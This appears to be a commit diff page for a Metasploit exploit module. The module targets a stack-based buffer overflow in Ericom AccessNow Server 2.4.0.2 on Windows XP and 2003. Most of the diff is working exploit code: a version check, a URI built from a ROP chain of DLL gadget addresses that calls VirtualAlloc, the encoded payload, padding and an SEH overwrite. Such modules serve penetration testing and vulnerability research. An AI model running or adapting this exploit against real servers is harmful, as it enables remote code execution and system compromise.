Finish module
jvazquez-r7
parent
8f8af0e93a
commit
1133332702
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
|
||||
vulnerability is due to an insecure usage of vsprintf with used controlled data,
|
||||
which can be triggered with a malformed HTTP request. This module has been tested
|
||||
successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003
|
||||
successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
|
||||
Server SP2.
|
||||
},
|
||||
'Author' =>
|
||||
|
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
|
|
@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]',
|
||||
[ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
|
||||
{
|
||||
'RopOffset' => 62,
|
||||
'Offset' => 30668,
|
||||
|
|
@ -63,22 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => '/AccessNow/start.html'
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/
|
||||
return Exploit::CheckCode::Detected
|
||||
unless res && res.code == 200 && res.headers['Server']
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
if res.headers['Server'] =~ /Ericom AccessNow Server/
|
||||
return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
|
||||
elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
|
||||
return Exploit::CheckCode::Detected # Ericom AccessNow 3
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit_uri
|
||||
uri = "A " # To ensure a "malformed request" error message
|
||||
uri << "C" * (62)
|
||||
uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
|
||||
uri << rand_text(target['RopOffset'])
|
||||
uri << create_rop_chain
|
||||
uri << payload.encoded
|
||||
print_status("#{Rex::Text.to_hex_dump(payload.encoded)}")
|
||||
uri << "B" * (0x77cc - uri.length)
|
||||
uri << "CCCC" #nseh
|
||||
uri << [0x104da1e5].pack("V") #seh
|
||||
uri << rand_text(target['Offset'] - uri.length)
|
||||
uri << rand_text(4) # nseh
|
||||
uri << [target.ret].pack("V") # seh
|
||||
|
||||
uri
|
||||
end
|
||||
|
|
@ -96,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# rop chain generated with mona.py - www.corelan.be
|
||||
rop_gadgets =
|
||||
[
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
|
||||
0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
|
||||
0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
|
||||
0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
|
||||
|
|
|
|||
Loading…
Reference in New Issue